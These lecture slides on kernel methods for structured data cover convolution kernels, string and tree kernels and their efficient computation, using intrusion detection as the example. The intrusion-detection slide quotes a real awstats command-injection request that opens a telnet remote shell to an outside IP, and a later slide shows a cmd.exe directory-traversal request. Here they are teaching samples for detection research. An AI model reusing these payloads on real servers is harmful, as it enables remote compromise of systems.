
Lecture 9: Kernel Methods for Structured Inputs

Pavel Laskov and Blaine Nelson

Cognitive Systems Group

Wilhelm Schickard Institute for Computer Science

Universität Tübingen, Germany

Advanced Topics in Machine Learning, 2012


What We Have Learned So Far


Learning problems are defined in terms of kernel functions reflecting the geometry of training data.

What if the data does not naturally belong to inner product spaces?


Example: Intrusion Detection

> GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: POPUPCHECK=1150521721386\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost: www.spiegel.de\x0d\x0a\x0d\x0a

> GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ctelnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e219%204321;echo%20YYY;echo| HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d\x0aHost: wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a\x0d\x0a

> GET /Images/200606/tscreen2.gif HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: .ASPXANONYMOUS=AcaruKtUwo5mMjliZjIxZC1kYzI1LTQyYzQtYTMyNy03YWI2MjlkMjhiZGQ1; CommunityServer-UserCookie1001=lv=5/16/2006 12:27:01 PM&mra=5/17/2006 9:02:37 AM\x0d\x0aUser-Agent: Mozilla/5.0(Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost: www.thedailywtf.com\x0d\x0a\x0d\x0a


Examples of Structured Input Data

Histograms

Trees (e.g., parse trees of sentences such as "Jeff ate the apple" and "John hit the red car")

Strings

Graphs

Convolution Kernels in a Nutshell

Decompose structured objects into comparable parts.

Aggregate the values of similarity measures for individual parts.


R-Convolution

Let X be a set of composite objects (e.g., cars), and let X_1, ..., X_D be sets of parts (e.g., wheels, brakes, etc.). All sets are assumed countable.

Let R denote the relation "being part of":

R(x_1, ..., x_D, x) = 1 iff x_1, ..., x_D are parts of x

The inverse relation R^{-1} is defined as:

R^{-1}(x) = \{ (x_1, \ldots, x_D) : R(x_1, \ldots, x_D, x) = 1 \}

In other words, for each object x, R^{-1}(x) is the set of part tuples that make up x.

We say that R is finite if R^{-1}(x) is finite for all x ∈ X.


R-Convolution: A Naive Example

Compare two cars, e.g., an Alfa Romeo Junior and a Lada Niva, part by part:

wheels
headlights
bumpers
transmission
differential
tow coupling
...


R-Convolution: Further Examples

Let x be a D-tuple in X = X_1 × ... × X_D, and let each of the D components of x be a part of x. Then R(x_1, ..., x_D, x) = 1 iff (x_1, ..., x_D) = x.

Let X_1 = X_2 = X be the set of all finite strings over a finite alphabet. Define R(x_1, x_2, x) = 1 iff x = x_1 ∘ x_2, i.e., x is the concatenation of x_1 and x_2.

Let X_1 = ... = X_D = X be the set of ordered, rooted trees of degree D. Define R(x_1, ..., x_D, x) = 1 iff x_1, ..., x_D are the D subtrees of the root of x ∈ X.

R-Convolution Kernel

Definition

Let x, y ∈ X, and let (x_1, ..., x_D) ∈ R^{-1}(x) and (y_1, ..., y_D) ∈ R^{-1}(y) denote their decompositions into parts. Let K_d(x_d, y_d) be a kernel between the d-th parts of x and y (1 ≤ d ≤ D). Then the convolution kernel between x and y is defined as:

K(x, y) = \sum_{(x_1, \ldots, x_D) \in R^{-1}(x)} \; \sum_{(y_1, \ldots, y_D) \in R^{-1}(y)} \; \prod_{d=1}^{D} K_d(x_d, y_d)
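To make the definition concrete, here is a minimal sketch of a generic R-convolution kernel in Python; the decomposition function and the part kernels passed to it are illustrative assumptions, not part of the slides.

```python
from itertools import product

def convolution_kernel(x, y, decompositions, part_kernels):
    """Generic R-convolution kernel: sum over all pairs of part tuples
    from R^{-1}(x) and R^{-1}(y), product over the D part kernels."""
    total = 0.0
    for xs, ys in product(decompositions(x), decompositions(y)):
        value = 1.0
        for Kd, xd, yd in zip(part_kernels, xs, ys):
            value *= Kd(xd, yd)
        total += value
    return total

# Illustration with the concatenation relation from the previous slide:
# a string is decomposed into every (prefix, suffix) pair, and each part
# is compared with a delta kernel.
splits = lambda s: [(s[:i], s[i:]) for i in range(len(s) + 1)]
delta = lambda a, b: 1.0 if a == b else 0.0

print(convolution_kernel("abab", "abab", splits, [delta, delta]))  # 5.0
print(convolution_kernel("abab", "abba", splits, [delta, delta]))  # 0.0
```

Under delta part kernels this particular decomposition only rewards identical strings (each of the five matching splits of "abab" contributes 1); richer decompositions and part kernels give more informative similarity measures, as the following slides show.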


Examples of R-Convolution Kernels

The RBF kernel is a convolution kernel. Let each of the D dimensions of x be a part, and let K_d(x_d, y_d) = exp(−(x_d − y_d)²/2σ²). Then

K(x, y) = \prod_{d=1}^{D} e^{-(x_d - y_d)^2 / 2\sigma^2} = e^{-\sum_{d=1}^{D} (x_d - y_d)^2 / 2\sigma^2} = e^{-\|x - y\|^2 / 2\sigma^2}

The linear kernel K(x, y) = \sum_{d=1}^{D} x_d y_d is not a convolution kernel, except for the trivial "single part" decomposition. For any other decomposition, we would need to sum products of more than one term, which contradicts the formula for the linear kernel.
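A quick numerical check of this factorization (a sketch; the test vectors and sigma are arbitrary):

```python
import math

x = [0.3, -1.2, 2.0]
y = [1.0, -0.7, 1.5]
sigma = 0.8

# Product of per-coordinate Gaussian part kernels ...
product_of_parts = math.prod(
    math.exp(-(xd - yd) ** 2 / (2 * sigma ** 2)) for xd, yd in zip(x, y)
)
# ... equals the RBF kernel on the full vectors.
rbf = math.exp(-sum((xd - yd) ** 2 for xd, yd in zip(x, y)) / (2 * sigma ** 2))
print(product_of_parts, rbf)  # both print the same value
```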

Subset Product Kernel

Theorem

Let K be a kernel on a set U × U. Then for all finite, non-empty subsets A, B ⊆ U,

K'(A, B) = \sum_{x \in A} \sum_{y \in B} K(x, y)

is a valid kernel.

Subset Product Kernel

Proof.

Goal: show that K'(A, B) is an inner product in some space...

Recall that for any point u ∈ U, K(u, ·) is a function K_u in some RKHS H. Let f_A = \sum_{u \in A} K_u and f_B = \sum_{u \in B} K_u. Define

\langle f_A, f_B \rangle := \sum_{x \in A} \sum_{y \in B} K(x, y)

We need to show that this satisfies the properties of an inner product... Let f_C = \sum_{u \in C} K_u. Clearly,

\langle f_A + f_C, f_B \rangle = \sum_{x \in A \cup C} \sum_{y \in B} K(x, y) = \sum_{x \in A} \sum_{y \in B} K(x, y) + \sum_{x \in C} \sum_{y \in B} K(x, y)

The other properties of the inner product can be proved similarly.
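The claim can also be sanity-checked numerically. The sketch below (assuming numpy; the base kernel and the random subsets are arbitrary choices) builds the Gram matrix of K' over a few finite subsets of points and confirms that it is positive semi-definite:

```python
import numpy as np

rng = np.random.default_rng(0)

def base_kernel(u, v, sigma=1.0):
    """Base RBF kernel on points of U = R^2."""
    return np.exp(-np.sum((u - v) ** 2) / (2 * sigma ** 2))

def subset_kernel(A, B):
    """K'(A, B) = sum over all pairs (x in A, y in B) of K(x, y)."""
    return sum(base_kernel(x, y) for x in A for y in B)

# A few finite subsets of R^2 with different sizes.
subsets = [rng.normal(size=(m, 2)) for m in (3, 5, 2, 4)]
G = np.array([[subset_kernel(A, B) for B in subsets] for A in subsets])

print(np.linalg.eigvalsh(G).min() >= -1e-9)  # True: the Gram matrix is PSD
```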

Back to the R-Convolution Kernel

Theorem

K(x, y) = \sum_{(x_1, \ldots, x_D) \in R^{-1}(x)} \; \sum_{(y_1, \ldots, y_D) \in R^{-1}(y)} \; \prod_{d=1}^{D} K_d(x_d, y_d)

is a valid kernel.

Back to the R-Convolution Kernel

Proof.

Let U = X_1 × ... × X_D. From the closure of kernels under the tensor product, it follows that

K((x_1, \ldots, x_D), (y_1, \ldots, y_D)) = \prod_{d=1}^{D} K_d(x_d, y_d)

is a kernel on U × U. Applying the Subset Product Kernel Theorem for A = R^{-1}(x), B = R^{-1}(y), the theorem's claim follows.

End of Theory



Convolution Kernels for Strings

Let x, y ∈ A* be two strings over the alphabet A. How can we define K(x, y) using the ideas of convolution kernels?

Let D = 1 and take X_1 to be the set of all possible strings of length n ("n-grams") over the alphabet A, so |X_1| = |A|^n.

For any x ∈ A* and any u ∈ X_1, define R(u, x) = 1 iff u ⊆ x, i.e., the n-gram u occurs in x.

Then R^{-1}(x) is the set of all n-grams contained in x.

Define the part kernel K_1(u, v) = 1[u = v].

K(x, y) = \sum_{u \in R^{-1}(x)} \; \sum_{v \in R^{-1}(y)} 1[u = v]
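A minimal sketch of this n-gram kernel in Python, written directly as the double sum over parts; here R^{-1}(x) is taken as the set of distinct n-grams of x, matching the set-valued definition above:

```python
def ngrams(x, n):
    """R^{-1}(x): the set of all n-grams occurring in the string x."""
    return {x[i:i + n] for i in range(len(x) - n + 1)}

def ngram_kernel(x, y, n):
    """Convolution kernel: sum of 1[u == v] over all pairs of parts."""
    return sum(1 for u in ngrams(x, n) for v in ngrams(y, n) if u == v)

print(ngram_kernel("abbaa", "baaaa", 2))  # number of distinct 2-grams shared by both strings
```

Counting occurrences instead of distinct n-grams (i.e., treating R^{-1}(x) as a multiset) yields the histogram embedding used on the following slides.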

Convolution Kernels for Strings (ctd.)

An alternative definition of a kernel for two strings can be obtained as follows:

Let D = 1 and take X_1 to be the set of all possible strings of arbitrary length over the alphabet A, so |X_1| = ∞.

For any x ∈ A* and any u ∈ X_1, define R(u, x) = 1 iff u ⊆ x.

Then R^{-1}(x) is the set of all substrings contained in x.

Define the part kernel K_1(u, v) = 1[u = v].

K(x, y) = \sum_{u \in R^{-1}(x)} \; \sum_{v \in R^{-1}(y)} 1[u = v]

Notice that the number of terms in the summation remains finite despite the infinite dimensionality of X_1.

Geometry of String Kernels

Sequences:

1. blabla blubla blablabu aa
2. bla blablaa bulab bb abla
3. a blabla blabla ablub bla
4. blab blab abba blabla blu

Figure: each sequence is embedded via a histogram of its subsequences (features such as a, b, aa, bb, ab, ba, la, bu, bla, blu, lab, lub, ...); the four histograms place the sequences as points in a feature space, and the geometry of these points reflects the similarity of the sequences.

Metric Embedding of Strings

Define the language S ⊆ A* of possible features, e.g., n-grams, words, or all subsequences.

For each sequence x, count the occurrences of each feature in it:

\phi : x \longrightarrow (\phi_s(x))_{s \in S}

Use φ_s(x) as the s-th coordinate of x in a vector space of dimensionality |S|.

Define K(x, y) := \langle \phi(x), \phi(y) \rangle. This is equivalent to K(x, y) defined by the convolution kernel!
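A sketch of the explicit embedding with occurrence counts, using Python's collections.Counter as a sparse feature vector and n-grams of a fixed length as the feature language S:

```python
from collections import Counter

def embed(x, n=2):
    """phi(x): occurrence counts of the n-grams (features s in S) of x."""
    return Counter(x[i:i + n] for i in range(len(x) - n + 1))

def linear_kernel(x, y, n=2):
    """K(x, y) = <phi(x), phi(y)>, computed over the shared non-zero features."""
    px, py = embed(x, n), embed(y, n)
    return sum(px[s] * py[s] for s in px.keys() & py.keys())

print(embed("abbaa"))                   # Counter({'ab': 1, 'bb': 1, 'ba': 1, 'aa': 1})
print(linear_kernel("abbaa", "baaaa"))  # 1*1 (ba) + 1*3 (aa) = 4
```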

Similarity Measure for Embedded Strings

Metric embedding enables the application of various vectorial similarity measures to sequences, e.g.:

Kernels K(x, y):
  Linear:    \sum_{s \in S} \phi_s(x) \phi_s(y)
  RBF:       \exp(-d(x, y)^2 / \sigma)

Distances d(x, y):
  Manhattan: \sum_{s \in S} |\phi_s(x) - \phi_s(y)|
  Minkowski: \sqrt[k]{\sum_{s \in S} |\phi_s(x) - \phi_s(y)|^k}
  Hamming:   \sum_{s \in S} \operatorname{sgn} |\phi_s(x) - \phi_s(y)|
  Chebyshev: \max_{s \in S} |\phi_s(x) - \phi_s(y)|

Similarity coefficients: Jaccard, Kulczynski, ...
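A sketch of a few of these measures on the sparse embeddings, iterating over the union of non-zero features (the embed helper repeats the n-gram counting from the previous sketch):

```python
from collections import Counter

def embed(x, n=2):
    return Counter(x[i:i + n] for i in range(len(x) - n + 1))

def manhattan(px, py):
    # Iterate over the union of non-zero features of both embeddings.
    return sum(abs(px[s] - py[s]) for s in px.keys() | py.keys())

def minkowski(px, py, k=3):
    return sum(abs(px[s] - py[s]) ** k for s in px.keys() | py.keys()) ** (1.0 / k)

def chebyshev(px, py):
    return max(abs(px[s] - py[s]) for s in px.keys() | py.keys())

px, py = embed("abbaa"), embed("baaaa")
print(manhattan(px, py), minkowski(px, py), chebyshev(px, py))
```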


Embedding example

X = abrakadabra
Y = barakobama

1-gram embedding:

          X      Y      X · Y
a         5      4      20
b         2      2      4
d         1      -      -
k         1      1      1
m         -      1      -
o         -      1      -
r         2      1      2
          5.92   4.90   27      (norms of X and Y, total dot product)

∠XY = 21.5°

2-gram embedding:

          X      Y      X · Y
ab        2      -      -
ad        1      -      -
ak        1      1      1
am        -      1      -
ar        -      1      -
ba        -      2      -
br        2      -      -
da        1      -      -
ka        1      -      -
ko        -      1      -
ma        -      1      -
ob        -      1      -
ra        2      1      2
          4.00   3.46   3       (norms of X and Y, total dot product)

∠XY = 77.5°
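The embedding computation can be reproduced with a few lines of Python (a sketch; it recomputes counts, norms and angles from the raw strings, so the printed values may differ slightly from the rounded figures above):

```python
import math
from collections import Counter

def embed(x, n):
    return Counter(x[i:i + n] for i in range(len(x) - n + 1))

def compare(px, py):
    """Dot product, norms, and angle (degrees) between two embeddings."""
    dot = sum(px[s] * py[s] for s in px.keys() & py.keys())
    nx = math.sqrt(sum(v * v for v in px.values()))
    ny = math.sqrt(sum(v * v for v in py.values()))
    return dot, nx, ny, math.degrees(math.acos(dot / (nx * ny)))

for n in (1, 2):
    print(n, compare(embed("abrakadabra", n), embed("barakobama", n)))
```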


Implementation of String Kernels

General observations

The embedding space has huge dimensionality but is very sparse; at most a linear number of entries are different from zero in each sample.

Computation of similarity measures requires operations on either the intersection or the union of the sets of non-zero features of the two samples.

Implementation strategies

Explicit but sparse representation of feature vectors

⇒ sorted arrays or hash tables

Implicit and general representations

⇒ tries, suffix trees, suffix arrays


String Kernels using Sorted Arrays

Store all features in sorted arrays

Traverse the feature arrays of two samples in parallel to find matching elements.

Figure: φ(x) and φ(z) stored as sorted arrays of (feature, count) pairs, e.g. aa (3), ab (2), bc (2), cc (1) and ab (3), ba (2), bb (1), bc (4); a simultaneous traversal matches the features common to both samples (here ab and bc).

Running time: sorting O(n), comparison O(n).
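A sketch of the sorted-array strategy in Python: each sample's n-gram counts are stored as an array sorted by feature, and one merge-style pass over both arrays computes the dot product (the linear-time extraction and sorting tricks used in practice are not reproduced here):

```python
def sorted_features(x, n=2):
    """Sorted array of (n-gram, count) pairs for string x."""
    counts = {}
    for i in range(len(x) - n + 1):
        g = x[i:i + n]
        counts[g] = counts.get(g, 0) + 1
    return sorted(counts.items())

def dot_product(fx, fz):
    """Merge-style traversal of two sorted feature arrays."""
    i = j = 0
    total = 0
    while i < len(fx) and j < len(fz):
        if fx[i][0] == fz[j][0]:
            total += fx[i][1] * fz[j][1]
            i += 1
            j += 1
        elif fx[i][0] < fz[j][0]:
            i += 1
        else:
            j += 1
    return total

print(dot_product(sorted_features("abbaa"), sorted_features("baaaa")))  # 4
```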


String Kernels using Generalized Suffix Trees

2-gram counts for "abbaa" and "baaaa", read off a generalized suffix tree:

2-gram   "abbaa"   "baaaa"
aa        1         3
ab        1         0
ba        1         1
bb        1         0

"abbaa" · "baaaa" = 1·3 + 1·0 + 1·1 + 1·0 = 4

Figure: the generalized suffix tree of "abbaa#" and "baaaa$" (with distinct terminal symbols # and $); every node is annotated with the number of suffixes of each string passing through it, so the occurrence counts of all common substrings, and hence the kernel value, can be read off in a single traversal.

Tree Kernels: Motivation

Trees are ubiquitous representations in various applications:

Parsing: parse trees
Content representation: XML, DOM
Bioinformatics: phylogeny

Ad-hoc features related to trees, e.g. the number of nodes or edges, are not informative for learning.

Structural properties of trees, on the other hand, may be very discriminative.

Example: Normal HTTP Request

GET /test.gif HTTP/1.1<NL> Accept: */*<NL> Accept-Language: en<NL>

Referer: http://host/<NL> Connection: keep-alive<NL>

Parse tree of the request (indentation indicates nesting):

<httpSession>
  <request>
    <method> GET
    <uri>
      <path> /test.gif
    <version> HTTP/1.1
    <reqhdr>
      <hdr> 1
        <hdrkey> Accept:
        <hdrval> */*
      <hdr> 2
        <hdrkey> Referer:
        <hdrval> http://host
      <hdr> 3
        <hdrkey> Connection:
        <hdrval> keep-alive

Example: Malicious HTTP Request

GET /scripts/..%%35c../cmd.exe?/c+dir+c:\ HTTP/1.0

Parse tree of the request (indentation indicates nesting):

<httpSession>
  <request>
    <method> GET
    <uri>
      <path> /scripts/..%%35c../.../cmd.exe?
      <getparamlist>
        <getparam>
          <getkey> /c+dir+c:\
    <version> HTTP/1.0


Convolution Kernels for Trees

Similar to strings, we can define kernels for trees using the convolution kernel framework:

Let D = 1 and X_1 = X be the set of all trees, so |X_1| = |X| = ∞.

For any x ∈ X and any u ∈ X_1, define R(u, x) = 1 iff u ⊆ x, i.e., u is a subtree of x.

Then R^{-1}(x) is the set of all subtrees contained in x.

Define the part kernel K_1(u, v) = 1[u = v].

K(x, y) = \sum_{u \in R^{-1}(x)} \; \sum_{v \in R^{-1}(y)} 1[u = v]

Problem: testing for equality between two trees may be extremely costly!


Recursive Computation of Tree Kernels

Two useful facts:

Transitivity of the subtree relationship: u ⊆ v and v ⊆ w ⇒ u ⊆ w.

Necessary condition for equality: two trees are equal only if all of their subtrees are equal.

Recursive scheme

Let Ch(x) denote the set of immediate children of the root of a (sub)tree x, and let |x| := |Ch(x)|.

If Ch(x) ≠ Ch(y), return 0.

If |x| = |y| = 0 (both roots are leaves), return 1.

Otherwise return

K(x, y) = \prod_{i=1}^{|x|} (1 + K(x_i, y_i))
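A minimal sketch of this recursion in Python; trees are represented here as (label, children) tuples, an assumption made only for illustration, and the root-label comparison is folded into the children check:

```python
def tree_kernel(x, y):
    """Recursive subtree-matching kernel on trees given as (label, children) tuples."""
    (label_x, kids_x), (label_y, kids_y) = x, y
    # If the roots or their immediate child labels differ, no subtree can match.
    if label_x != label_y or [k[0] for k in kids_x] != [k[0] for k in kids_y]:
        return 0
    # Two matching leaves: exactly one common subtree.
    if not kids_x:
        return 1
    # Otherwise multiply over child pairs: each factor counts the matches
    # below that child, plus one for stopping at the child itself.
    result = 1
    for cx, cy in zip(kids_x, kids_y):
        result *= 1 + tree_kernel(cx, cy)
    return result

t1 = ("S", [("NP", [("N", [])]), ("VP", [("V", []), ("NP", [("N", [])])])])
t2 = ("S", [("NP", [("N", [])]), ("VP", [("V", []), ("NP", [("D", []), ("N", [])])])])
print(tree_kernel(t1, t1), tree_kernel(t1, t2))  # t1 shares more structure with itself than with t2
```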


Computation of Recursive Clause

Find a pair of nodes with identical subsets of children.

Add one for the nodes themselves (subtrees of cardinality 1).

Add counts for all matching subtrees.

Multiply together and return the total count.


Summary

Kernels for structured data extend learning methods to a vast variety of practical data types.

A generic framework for handling structured data is offered by convolution kernels.

Special data structures and algorithms are needed for efficiency.

Extensive range of applications:

natural language processing
bioinformatics
computer security

Bibliography I

[1] M. Collins and N. Duffy. Convolution kernels for natural language. In Advances in Neural Information Processing Systems (NIPS), volume 16, pages 625–632, 2002.

[2] D. Haussler. Convolution kernels on discrete structures. Technical Report UCSC-CRL-99-10, UC Santa Cruz, July 1999.

[3] K. Rieck and P. Laskov. Linear-time computation of similarity measures for sequential data. Journal of Machine Learning Research, 9:23–48, 2008.
